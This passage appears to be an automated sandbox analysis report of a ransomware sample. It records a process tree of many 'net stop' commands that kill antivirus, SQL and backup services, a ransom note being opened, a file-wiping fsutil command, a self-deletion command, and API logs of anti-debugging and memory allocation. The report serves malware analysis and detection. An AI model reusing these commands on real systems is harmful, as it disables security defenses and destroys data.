  - net1.exe C:\Windows\system32\net1 stop sacsvr /y
    9568
- net.exe "net.exe" stop sophossps /y
  9280
  - net1.exe C:\Windows\system32\net1 stop sophossps /y
    10100
- net.exe "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  7356
  - net1.exe C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    7684
- net.exe "net.exe" stop swi_update /y
  9852
  - net1.exe C:\Windows\system32\net1 stop swi_update /y
    9304
- net.exe "net.exe" stop TrueKeyServiceHelper /y
  9596
  - net1.exe C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3200
- net.exe "net.exe" stop SQLAgent$SQL_2008 /y
  8820
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    10236
- net.exe "net.exe" stop SQLAgent$CXDB /y
  9784
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    9660
- net.exe "net.exe" stop Antivirus /y
  7640
  - net1.exe C:\Windows\system32\net1 stop Antivirus /y
    9996
- net.exe "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  9732
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    9684
- net.exe "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  9856
  - net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    9444
- net.exe "net.exe" stop SQLAgent$SOPHOS /y
  9908
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    9584
- net.exe "net.exe" stop SAVAdminService /y
  10084
  - net1.exe C:\Windows\system32\net1 stop SAVAdminService /y
    10132
- net.exe "net.exe" stop swi_update_64 /y
  9872
  - net1.exe C:\Windows\system32\net1 stop swi_update_64 /y
    10036
- net.exe "net.exe" stop WRSVC /y
  9888
  - net1.exe C:\Windows\system32\net1 stop WRSVC /y
    10408
- net.exe "net.exe" stop SQLAgent$SQLEXPRESS /y
  6844
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    10452
- net.exe "net.exe" stop SQLAgent$ECWDB2 /y
  10304
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    10608
- net.exe "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  10360
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    10764
- net.exe "net.exe" stop mssql$vim_sqlexp /y
  10484
  - net1.exe C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    10848
- net.exe "net.exe" stop svcGenericHost /y
  10576
  - net1.exe C:\Windows\system32\net1 stop svcGenericHost /y
    11004
- notepad.exe "C:\Windows\System32\notepad.exe" C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt
  10540
- net.exe "net.exe" stop SAVService /y
  10712
  - net1.exe C:\Windows\system32\net1 stop SAVService /y
    11068
- net.exe "net.exe" stop TmCCSF /y
  10784
  - net1.exe C:\Windows\system32\net1 stop TmCCSF /y
    11096
- net.exe "net.exe" stop vapiendpoint /y
  10892
  - net1.exe C:\Windows\system32\net1 stop vapiendpoint /y
    11176
- cmd.exe "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  10968
  - PING.EXE ping 127.0.0.7 -n 3
    10340
  - fsutil.exe fsutil file setZeroData offset=0 length=524288 “%s”
    6028
- net.exe "net.exe" stop SQLBrowser /y
  11136
  - net1.exe C:\Windows\system32\net1 stop SQLBrowser /y
    4008
- cmd.exe "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe
  11208
  - choice.exe choice /C Y /N /D Y /T 3
    9028
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
172.217.25.14	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 24, 2021, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2021, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2021, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2021, 10:06 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2021, 10:06 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 24, 2021, 10:06 a.m.			0	0
IsDebuggerPresent March 24, 2021, 10:06 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW March 24, 2021, 10:07 a.m.	buffer: Y console_handle: 0x00000007	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 24, 2021, 10:06 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 24, 2021, 10:06 a.m.	stacktrace: 0xbd4dd3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 PreBindAssemblyEx+0x6798 StrongNameSignatureVerification-0xb7b3 clr+0x17e303 @ 0x6fd1e303 sxsJitStartup-0x14c66 clrjit+0x3fc2e @ 0x738bfc2e sxsJitStartup-0x36b91 clrjit+0x1dd03 @ 0x7389dd03 sxsJitStartup-0x52e34 clrjit+0x1a60 @ 0x73881a60 sxsJitStartup-0x52c52 clrjit+0x1c42 @ 0x73881c42 sxsJitStartup-0x52447 clrjit+0x244d @ 0x7388244d sxsJitStartup-0x50878 clrjit+0x401c @ 0x7388401c sxsJitStartup-0x50762 clrjit+0x4132 @ 0x73884132 sxsJitStartup-0x50612 clrjit+0x4282 @ 0x73884282 sxsJitStartup-0x502ff clrjit+0x4595 @ 0x73884595 CreateAssemblyNameObject+0x61d0 GetMetaDataInternalInterface-0x3229f clr+0x33669 @ 0x6fbd3669 CreateAssemblyNameObject+0x6268 GetMetaDataInternalInterface-0x32207 clr+0x33701 @ 0x6fbd3701 CreateAssemblyNameObject+0x62aa GetMetaDataInternalInterface-0x321c5 clr+0x33743 @ 0x6fbd3743 CreateAssemblyNameObject+0x6503 GetMetaDataInternalInterface-0x31f6c clr+0x3399c @ 0x6fbd399c CreateAssemblyNameObject+0x5ffd GetMetaDataInternalInterface-0x32472 clr+0x33496 @ 0x6fbd3496 CreateAssemblyNameObject+0x6c42 GetMetaDataInternalInterface-0x3182d clr+0x340db @ 0x6fbd40db DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x6fbbbcd5 DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x6fba2ae9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 c7 45 e4 00 00 00 00 c7 45 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbd7186 registers.esp: 3920956 registers.edi: 3920976 registers.eax: 0 registers.ebp: 3920992 registers.edx: 195 registers.ebx: 3922624 registers.esi: 37998636 registers.ecx: 0	1	0	0
__exception__ March 24, 2021, 10:06 a.m.	stacktrace: 0xbd4e87 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 PreBindAssemblyEx+0x6798 StrongNameSignatureVerification-0xb7b3 clr+0x17e303 @ 0x6fd1e303 sxsJitStartup-0x14c66 clrjit+0x3fc2e @ 0x738bfc2e sxsJitStartup-0x36b91 clrjit+0x1dd03 @ 0x7389dd03 sxsJitStartup-0x52e34 clrjit+0x1a60 @ 0x73881a60 sxsJitStartup-0x52c52 clrjit+0x1c42 @ 0x73881c42 sxsJitStartup-0x52447 clrjit+0x244d @ 0x7388244d sxsJitStartup-0x50878 clrjit+0x401c @ 0x7388401c sxsJitStartup-0x50762 clrjit+0x4132 @ 0x73884132 sxsJitStartup-0x50612 clrjit+0x4282 @ 0x73884282 sxsJitStartup-0x502ff clrjit+0x4595 @ 0x73884595 CreateAssemblyNameObject+0x61d0 GetMetaDataInternalInterface-0x3229f clr+0x33669 @ 0x6fbd3669 CreateAssemblyNameObject+0x6268 GetMetaDataInternalInterface-0x32207 clr+0x33701 @ 0x6fbd3701 CreateAssemblyNameObject+0x62aa GetMetaDataInternalInterface-0x321c5 clr+0x33743 @ 0x6fbd3743 CreateAssemblyNameObject+0x6503 GetMetaDataInternalInterface-0x31f6c clr+0x3399c @ 0x6fbd399c CreateAssemblyNameObject+0x5ffd GetMetaDataInternalInterface-0x32472 clr+0x33496 @ 0x6fbd3496 CreateAssemblyNameObject+0x6c42 GetMetaDataInternalInterface-0x3182d clr+0x340db @ 0x6fbd40db DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x6fbbbcd5 DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x6fba2ae9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 c7 45 e4 00 00 00 00 c7 45 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xbd7186 registers.esp: 3920956 registers.edi: 3920976 registers.eax: 0 registers.ebp: 3920992 registers.edx: 195 registers.ebx: 3922624 registers.esi: 38026532 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 24, 2021, 10:06 a.m.

stacktrace:

0xbd4dd3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
PreBindAssemblyEx+0x6798 StrongNameSignatureVerification-0xb7b3 clr+0x17e303 @ 0x6fd1e303
sxsJitStartup-0x14c66 clrjit+0x3fc2e @ 0x738bfc2e
sxsJitStartup-0x36b91 clrjit+0x1dd03 @ 0x7389dd03
sxsJitStartup-0x52e34 clrjit+0x1a60 @ 0x73881a60
sxsJitStartup-0x52c52 clrjit+0x1c42 @ 0x73881c42
sxsJitStartup-0x52447 clrjit+0x244d @ 0x7388244d
sxsJitStartup-0x50878 clrjit+0x401c @ 0x7388401c
sxsJitStartup-0x50762 clrjit+0x4132 @ 0x73884132
sxsJitStartup-0x50612 clrjit+0x4282 @ 0x73884282
sxsJitStartup-0x502ff clrjit+0x4595 @ 0x73884595
CreateAssemblyNameObject+0x61d0 GetMetaDataInternalInterface-0x3229f clr+0x33669 @ 0x6fbd3669
CreateAssemblyNameObject+0x6268 GetMetaDataInternalInterface-0x32207 clr+0x33701 @ 0x6fbd3701
CreateAssemblyNameObject+0x62aa GetMetaDataInternalInterface-0x321c5 clr+0x33743 @ 0x6fbd3743
CreateAssemblyNameObject+0x6503 GetMetaDataInternalInterface-0x31f6c clr+0x3399c @ 0x6fbd399c
CreateAssemblyNameObject+0x5ffd GetMetaDataInternalInterface-0x32472 clr+0x33496 @ 0x6fbd3496
CreateAssemblyNameObject+0x6c42 GetMetaDataInternalInterface-0x3182d clr+0x340db @ 0x6fbd40db
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x6fbbbcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x6fba2ae9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 c7 45 e4 00 00 00 00 c7 45
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xbd7186
registers.esp: 3920956
registers.edi: 3920976
registers.eax: 0
registers.ebp: 3920992
registers.edx: 195
registers.ebx: 3922624
registers.esi: 37998636
registers.ecx: 0

__exception__

March 24, 2021, 10:06 a.m.

stacktrace:

0xbd4e87
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
PreBindAssemblyEx+0x6798 StrongNameSignatureVerification-0xb7b3 clr+0x17e303 @ 0x6fd1e303
sxsJitStartup-0x14c66 clrjit+0x3fc2e @ 0x738bfc2e
sxsJitStartup-0x36b91 clrjit+0x1dd03 @ 0x7389dd03
sxsJitStartup-0x52e34 clrjit+0x1a60 @ 0x73881a60
sxsJitStartup-0x52c52 clrjit+0x1c42 @ 0x73881c42
sxsJitStartup-0x52447 clrjit+0x244d @ 0x7388244d
sxsJitStartup-0x50878 clrjit+0x401c @ 0x7388401c
sxsJitStartup-0x50762 clrjit+0x4132 @ 0x73884132
sxsJitStartup-0x50612 clrjit+0x4282 @ 0x73884282
sxsJitStartup-0x502ff clrjit+0x4595 @ 0x73884595
CreateAssemblyNameObject+0x61d0 GetMetaDataInternalInterface-0x3229f clr+0x33669 @ 0x6fbd3669
CreateAssemblyNameObject+0x6268 GetMetaDataInternalInterface-0x32207 clr+0x33701 @ 0x6fbd3701
CreateAssemblyNameObject+0x62aa GetMetaDataInternalInterface-0x321c5 clr+0x33743 @ 0x6fbd3743
CreateAssemblyNameObject+0x6503 GetMetaDataInternalInterface-0x31f6c clr+0x3399c @ 0x6fbd399c
CreateAssemblyNameObject+0x5ffd GetMetaDataInternalInterface-0x32472 clr+0x33496 @ 0x6fbd3496
CreateAssemblyNameObject+0x6c42 GetMetaDataInternalInterface-0x3182d clr+0x340db @ 0x6fbd40db
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x6fbbbcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x6fba2ae9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

Allocates read-write-execute memory (usually to unpack itself) (42 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00670000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0069f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
